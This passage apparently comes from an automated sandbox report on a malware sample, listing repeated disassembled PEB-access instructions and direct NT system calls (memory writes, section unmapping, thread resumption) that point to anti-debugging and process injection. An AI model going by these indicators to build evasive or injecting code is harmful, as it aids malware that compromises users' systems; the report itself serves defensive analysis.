          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B62A0 mov eax, dword ptr fs:[00000030h]0_2_019B62A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B62A0 mov eax, dword ptr fs:[00000030h]0_2_019B62A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B62A0 mov eax, dword ptr fs:[00000030h]0_2_019B62A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192A2C3 mov eax, dword ptr fs:[00000030h]0_2_0192A2C3
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192A2C3 mov eax, dword ptr fs:[00000030h]0_2_0192A2C3
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192A2C3 mov eax, dword ptr fs:[00000030h]0_2_0192A2C3
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192A2C3 mov eax, dword ptr fs:[00000030h]0_2_0192A2C3
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192A2C3 mov eax, dword ptr fs:[00000030h]0_2_0192A2C3
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019302E1 mov eax, dword ptr fs:[00000030h]0_2_019302E1
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019302E1 mov eax, dword ptr fs:[00000030h]0_2_019302E1
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019302E1 mov eax, dword ptr fs:[00000030h]0_2_019302E1
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191823B mov eax, dword ptr fs:[00000030h]0_2_0191823B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191A250 mov eax, dword ptr fs:[00000030h]0_2_0191A250
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01926259 mov eax, dword ptr fs:[00000030h]0_2_01926259
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019DA250 mov eax, dword ptr fs:[00000030h]0_2_019DA250
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019DA250 mov eax, dword ptr fs:[00000030h]0_2_019DA250
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A8243 mov eax, dword ptr fs:[00000030h]0_2_019A8243
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A8243 mov ecx, dword ptr fs:[00000030h]0_2_019A8243
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D0274 mov eax, dword ptr fs:[00000030h]0_2_019D0274
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D0274 mov eax, dword ptr fs:[00000030h]0_2_019D0274
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D0274 mov eax, dword ptr fs:[00000030h]0_2_019D0274
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D0274 mov eax, dword ptr fs:[00000030h]0_2_019D0274
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D0274 mov eax, dword ptr fs:[00000030h]0_2_019D0274
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D0274 mov eax, dword ptr fs:[00000030h]0_2_019D0274
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D0274 mov eax, dword ptr fs:[00000030h]0_2_019D0274
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D0274 mov eax, dword ptr fs:[00000030h]0_2_019D0274
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D0274 mov eax, dword ptr fs:[00000030h]0_2_019D0274
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D0274 mov eax, dword ptr fs:[00000030h]0_2_019D0274
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D0274 mov eax, dword ptr fs:[00000030h]0_2_019D0274
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D0274 mov eax, dword ptr fs:[00000030h]0_2_019D0274
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01924260 mov eax, dword ptr fs:[00000030h]0_2_01924260
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01924260 mov eax, dword ptr fs:[00000030h]0_2_01924260
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01924260 mov eax, dword ptr fs:[00000030h]0_2_01924260
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191826B mov eax, dword ptr fs:[00000030h]0_2_0191826B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E59C mov eax, dword ptr fs:[00000030h]0_2_0195E59C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01922582 mov eax, dword ptr fs:[00000030h]0_2_01922582
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01922582 mov ecx, dword ptr fs:[00000030h]0_2_01922582
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01954588 mov eax, dword ptr fs:[00000030h]0_2_01954588
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019445B1 mov eax, dword ptr fs:[00000030h]0_2_019445B1
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019445B1 mov eax, dword ptr fs:[00000030h]0_2_019445B1
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A05A7 mov eax, dword ptr fs:[00000030h]0_2_019A05A7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A05A7 mov eax, dword ptr fs:[00000030h]0_2_019A05A7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A05A7 mov eax, dword ptr fs:[00000030h]0_2_019A05A7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019265D0 mov eax, dword ptr fs:[00000030h]0_2_019265D0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195A5D0 mov eax, dword ptr fs:[00000030h]0_2_0195A5D0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195A5D0 mov eax, dword ptr fs:[00000030h]0_2_0195A5D0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E5CF mov eax, dword ptr fs:[00000030h]0_2_0195E5CF
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E5CF mov eax, dword ptr fs:[00000030h]0_2_0195E5CF
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019225E0 mov eax, dword ptr fs:[00000030h]0_2_019225E0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E5E7 mov eax, dword ptr fs:[00000030h]0_2_0194E5E7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E5E7 mov eax, dword ptr fs:[00000030h]0_2_0194E5E7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E5E7 mov eax, dword ptr fs:[00000030h]0_2_0194E5E7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E5E7 mov eax, dword ptr fs:[00000030h]0_2_0194E5E7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E5E7 mov eax, dword ptr fs:[00000030h]0_2_0194E5E7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E5E7 mov eax, dword ptr fs:[00000030h]0_2_0194E5E7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E5E7 mov eax, dword ptr fs:[00000030h]0_2_0194E5E7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E5E7 mov eax, dword ptr fs:[00000030h]0_2_0194E5E7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195C5ED mov eax, dword ptr fs:[00000030h]0_2_0195C5ED
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195C5ED mov eax, dword ptr fs:[00000030h]0_2_0195C5ED
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019B6500 mov eax, dword ptr fs:[00000030h]0_2_019B6500
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019F4500 mov eax, dword ptr fs:[00000030h]0_2_019F4500
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019F4500 mov eax, dword ptr fs:[00000030h]0_2_019F4500
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019F4500 mov eax, dword ptr fs:[00000030h]0_2_019F4500
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019F4500 mov eax, dword ptr fs:[00000030h]0_2_019F4500
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019F4500 mov eax, dword ptr fs:[00000030h]0_2_019F4500
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019F4500 mov eax, dword ptr fs:[00000030h]0_2_019F4500
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019F4500 mov eax, dword ptr fs:[00000030h]0_2_019F4500
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930535 mov eax, dword ptr fs:[00000030h]0_2_01930535
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930535 mov eax, dword ptr fs:[00000030h]0_2_01930535
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930535 mov eax, dword ptr fs:[00000030h]0_2_01930535
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930535 mov eax, dword ptr fs:[00000030h]0_2_01930535
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930535 mov eax, dword ptr fs:[00000030h]0_2_01930535
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930535 mov eax, dword ptr fs:[00000030h]0_2_01930535
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E53E mov eax, dword ptr fs:[00000030h]0_2_0194E53E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E53E mov eax, dword ptr fs:[00000030h]0_2_0194E53E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E53E mov eax, dword ptr fs:[00000030h]0_2_0194E53E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E53E mov eax, dword ptr fs:[00000030h]0_2_0194E53E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194E53E mov eax, dword ptr fs:[00000030h]0_2_0194E53E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01928550 mov eax, dword ptr fs:[00000030h]0_2_01928550
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01928550 mov eax, dword ptr fs:[00000030h]0_2_01928550
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195656A mov eax, dword ptr fs:[00000030h]0_2_0195656A
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195656A mov eax, dword ptr fs:[00000030h]0_2_0195656A
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195656A mov eax, dword ptr fs:[00000030h]0_2_0195656A
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019DA49A mov eax, dword ptr fs:[00000030h]0_2_019DA49A
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019544B0 mov ecx, dword ptr fs:[00000030h]0_2_019544B0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019AA4B0 mov eax, dword ptr fs:[00000030h]0_2_019AA4B0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019264AB mov eax, dword ptr fs:[00000030h]0_2_019264AB
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019204E5 mov ecx, dword ptr fs:[00000030h]0_2_019204E5
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01958402 mov eax, dword ptr fs:[00000030h]0_2_01958402
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01958402 mov eax, dword ptr fs:[00000030h]0_2_01958402
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01958402 mov eax, dword ptr fs:[00000030h]0_2_01958402
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195A430 mov eax, dword ptr fs:[00000030h]0_2_0195A430
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191E420 mov eax, dword ptr fs:[00000030h]0_2_0191E420
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191E420 mov eax, dword ptr fs:[00000030h]0_2_0191E420
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191E420 mov eax, dword ptr fs:[00000030h]0_2_0191E420
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191C427 mov eax, dword ptr fs:[00000030h]0_2_0191C427
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A6420 mov eax, dword ptr fs:[00000030h]0_2_019A6420
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A6420 mov eax, dword ptr fs:[00000030h]0_2_019A6420
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A6420 mov eax, dword ptr fs:[00000030h]0_2_019A6420
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A6420 mov eax, dword ptr fs:[00000030h]0_2_019A6420
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A6420 mov eax, dword ptr fs:[00000030h]0_2_019A6420
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A6420 mov eax, dword ptr fs:[00000030h]0_2_019A6420
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A6420 mov eax, dword ptr fs:[00000030h]0_2_019A6420
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019DA456 mov eax, dword ptr fs:[00000030h]0_2_019DA456
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0191645D mov eax, dword ptr fs:[00000030h]0_2_0191645D
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194245A mov eax, dword ptr fs:[00000030h]0_2_0194245A
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E443 mov eax, dword ptr fs:[00000030h]0_2_0195E443
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E443 mov eax, dword ptr fs:[00000030h]0_2_0195E443
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E443 mov eax, dword ptr fs:[00000030h]0_2_0195E443
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E443 mov eax, dword ptr fs:[00000030h]0_2_0195E443
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E443 mov eax, dword ptr fs:[00000030h]0_2_0195E443
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E443 mov eax, dword ptr fs:[00000030h]0_2_0195E443
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E443 mov eax, dword ptr fs:[00000030h]0_2_0195E443
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195E443 mov eax, dword ptr fs:[00000030h]0_2_0195E443
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194A470 mov eax, dword ptr fs:[00000030h]0_2_0194A470
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194A470 mov eax, dword ptr fs:[00000030h]0_2_0194A470
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0194A470 mov eax, dword ptr fs:[00000030h]0_2_0194A470
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019AC460 mov ecx, dword ptr fs:[00000030h]0_2_019AC460
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019C678E mov eax, dword ptr fs:[00000030h]0_2_019C678E
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019207AF mov eax, dword ptr fs:[00000030h]0_2_019207AF
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019D47A0 mov eax, dword ptr fs:[00000030h]0_2_019D47A0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0192C7C0 mov eax, dword ptr fs:[00000030h]0_2_0192C7C0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A07C3 mov eax, dword ptr fs:[00000030h]0_2_019A07C3
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019247FB mov eax, dword ptr fs:[00000030h]0_2_019247FB
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019247FB mov eax, dword ptr fs:[00000030h]0_2_019247FB
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019427ED mov eax, dword ptr fs:[00000030h]0_2_019427ED
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019427ED mov eax, dword ptr fs:[00000030h]0_2_019427ED
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019427ED mov eax, dword ptr fs:[00000030h]0_2_019427ED
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019AE7E1 mov eax, dword ptr fs:[00000030h]0_2_019AE7E1
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01920710 mov eax, dword ptr fs:[00000030h]0_2_01920710
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01950710 mov eax, dword ptr fs:[00000030h]0_2_01950710
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195C700 mov eax, dword ptr fs:[00000030h]0_2_0195C700
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195273C mov eax, dword ptr fs:[00000030h]0_2_0195273C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195273C mov ecx, dword ptr fs:[00000030h]0_2_0195273C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195273C mov eax, dword ptr fs:[00000030h]0_2_0195273C
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199C730 mov eax, dword ptr fs:[00000030h]0_2_0199C730
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195C720 mov eax, dword ptr fs:[00000030h]0_2_0195C720
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195C720 mov eax, dword ptr fs:[00000030h]0_2_0195C720
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01920750 mov eax, dword ptr fs:[00000030h]0_2_01920750
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962750 mov eax, dword ptr fs:[00000030h]0_2_01962750
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962750 mov eax, dword ptr fs:[00000030h]0_2_01962750
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019AE75D mov eax, dword ptr fs:[00000030h]0_2_019AE75D
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A4755 mov eax, dword ptr fs:[00000030h]0_2_019A4755
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195674D mov esi, dword ptr fs:[00000030h]0_2_0195674D
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195674D mov eax, dword ptr fs:[00000030h]0_2_0195674D
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195674D mov eax, dword ptr fs:[00000030h]0_2_0195674D
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01928770 mov eax, dword ptr fs:[00000030h]0_2_01928770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930770 mov eax, dword ptr fs:[00000030h]0_2_01930770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930770 mov eax, dword ptr fs:[00000030h]0_2_01930770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930770 mov eax, dword ptr fs:[00000030h]0_2_01930770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930770 mov eax, dword ptr fs:[00000030h]0_2_01930770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930770 mov eax, dword ptr fs:[00000030h]0_2_01930770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930770 mov eax, dword ptr fs:[00000030h]0_2_01930770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930770 mov eax, dword ptr fs:[00000030h]0_2_01930770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930770 mov eax, dword ptr fs:[00000030h]0_2_01930770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930770 mov eax, dword ptr fs:[00000030h]0_2_01930770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930770 mov eax, dword ptr fs:[00000030h]0_2_01930770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930770 mov eax, dword ptr fs:[00000030h]0_2_01930770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01930770 mov eax, dword ptr fs:[00000030h]0_2_01930770
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01924690 mov eax, dword ptr fs:[00000030h]0_2_01924690
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01924690 mov eax, dword ptr fs:[00000030h]0_2_01924690
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019566B0 mov eax, dword ptr fs:[00000030h]0_2_019566B0
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195C6A6 mov eax, dword ptr fs:[00000030h]0_2_0195C6A6
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195A6C7 mov ebx, dword ptr fs:[00000030h]0_2_0195A6C7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0195A6C7 mov eax, dword ptr fs:[00000030h]0_2_0195A6C7
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199E6F2 mov eax, dword ptr fs:[00000030h]0_2_0199E6F2
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199E6F2 mov eax, dword ptr fs:[00000030h]0_2_0199E6F2
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199E6F2 mov eax, dword ptr fs:[00000030h]0_2_0199E6F2
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199E6F2 mov eax, dword ptr fs:[00000030h]0_2_0199E6F2
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A06F1 mov eax, dword ptr fs:[00000030h]0_2_019A06F1
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_019A06F1 mov eax, dword ptr fs:[00000030h]0_2_019A06F1
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_01962619 mov eax, dword ptr fs:[00000030h]0_2_01962619
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0199E609 mov eax, dword ptr fs:[00000030h]0_2_0199E609
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193260B mov eax, dword ptr fs:[00000030h]0_2_0193260B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193260B mov eax, dword ptr fs:[00000030h]0_2_0193260B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193260B mov eax, dword ptr fs:[00000030h]0_2_0193260B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193260B mov eax, dword ptr fs:[00000030h]0_2_0193260B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193260B mov eax, dword ptr fs:[00000030h]0_2_0193260B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193260B mov eax, dword ptr fs:[00000030h]0_2_0193260B
          Source: C:\Users\user\Desktop\wavjjT3sEq.exeCode function: 0_2_0193260B mov eax, dword ptr fs:[00000030h]0_2_0193260B

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtUnmapViewOfSection: Direct from: 0x77462D3C
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtCreateMutant: Direct from: 0x774635CC
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtWriteVirtualMemory: Direct from: 0x77462E3C
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtMapViewOfSection: Direct from: 0x77462D1C
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtResumeThread: Direct from: 0x774636AC
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtProtectVirtualMemory: Direct from: 0x77462F9C
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtSetInformationProcess: Direct from: 0x77462C5C
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtSetInformationThread: Direct from: 0x774563F9
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtNotifyChangeKey: Direct from: 0x77463C2C
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtProtectVirtualMemory: Direct from: 0x77457B2E
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtAllocateVirtualMemory: Direct from: 0x77462BFC
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtQueryInformationProcess: Direct from: 0x77462C26
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtResumeThread: Direct from: 0x77462FBC
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtReadFile: Direct from: 0x77462ADC
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtQuerySystemInformation: Direct from: 0x77462DFC
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtDelayExecution: Direct from: 0x77462DDC
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtAllocateVirtualMemory: Direct from: 0x77463C9C
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtClose: Direct from: 0x77462B6C
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtCreateUserProcess: Direct from: 0x7746371C
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtWriteVirtualMemory: Direct from: 0x7746490C
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtAllocateVirtualMemory: Direct from: 0x774648EC
          Source: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe NtQuerySystemInformation: Direct from: 0x774648CC
